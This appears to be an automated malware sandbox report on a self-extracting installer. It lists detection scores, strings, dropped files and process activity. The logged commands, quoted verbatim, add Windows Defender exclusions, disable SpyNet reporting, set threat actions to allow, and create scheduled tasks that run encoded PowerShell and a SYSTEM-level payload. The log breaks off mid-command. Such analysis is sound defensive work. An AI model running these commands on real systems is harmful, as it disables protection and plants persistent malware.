Source: file.exe |
ReversingLabs: Detection: 42% |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
ReversingLabs: Detection: 73% |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Virustotal: Detection: 64% |
Perma Link |
Source: C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\Install.exe |
ReversingLabs: Detection: 46% |
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe |
ReversingLabs: Detection: 73% |
Source: C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\GPooAyT.exe |
ReversingLabs: Detection: 73% |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040553A FindFirstFileA, |
0_2_0040553A |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, |
0_2_004055DE |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\__data__\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\ |
Jump to behavior |
Source: powershell.exe, 00000011.00000002.445905069.000001B130DC7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.478781107.0000000003521000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000011.00000002.438569177.000001B128E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.353292546.000001B11A255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.434983992.000001B128D4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.333195759.000001B118F58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000011.00000002.350039488.000001B11A082000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000011.00000002.324046164.000001B118CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.481155183.0000000003F51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000011.00000002.344365256.000001B119BAD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000011.00000002.350039488.000001B11A082000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000011.00000002.333195759.000001B118F58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000011.00000002.333195759.000001B118F58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000011.00000002.333195759.000001B118F58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000011.00000002.350039488.000001B11A082000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000011.00000002.438569177.000001B128E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.353292546.000001B11A255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.434983992.000001B128D4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.333195759.000001B118F58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000011.00000002.344365256.000001B119BAD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000011.00000002.344365256.000001B119BAD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgX |
Source: powershell.exe, 00000011.00000002.344365256.000001B119BAD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand |
Source: Install.exe, 00000002.00000002.586322785.000000000B52A000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
|
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe |
Process created: Commandline size = 3260 |
|
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe |
Process created: Commandline size = 3260 |
Jump to behavior |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
File deleted: C:\Windows\SysWOW64\GroupPolicyKWFQc |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
File created: C:\Windows\system32\GroupPolicy\gpt.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004162A6 |
0_2_004162A6 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040E5A5 |
0_2_0040E5A5 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004126B0 |
0_2_004126B0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00403A01 |
0_2_00403A01 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00418EF1 |
0_2_00418EF1 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00418FCB |
0_2_00418FCB |
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00403A9C appears 33 times |
|
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00413954 appears 179 times |
|
Source: file.exe, 00000000.00000002.591622508.0000000000427000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: file.exe |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe A506223F4CA78C5C90CA3E02D00A1FEF0E74B7050712C2A5E7EBAA160FA6C879 |
Source: file.exe |
ReversingLabs: Detection: 42% |
Source: C:\Users\user\Desktop\file.exe |
File read: C:\Users\user\Desktop\file.exe |
Jump to behavior |
Source: file.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\file.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\Install.exe .\Install.exe |
|
Source: C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\Install.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe .\Install.exe /S /site_id "525403" |
|
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gqlLYiBSq" /SC once /ST 05:56:18 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gqlLYiBSq" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force |
|
Source: C:\Windows\System32\gpupdate.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gqlLYiBSq" |
|
Source: unknown |
Process created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:28:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe\" d8 /site_id 525403 /S" /V1 /F |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe d8 /site_id 525403 /S |
|
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAc |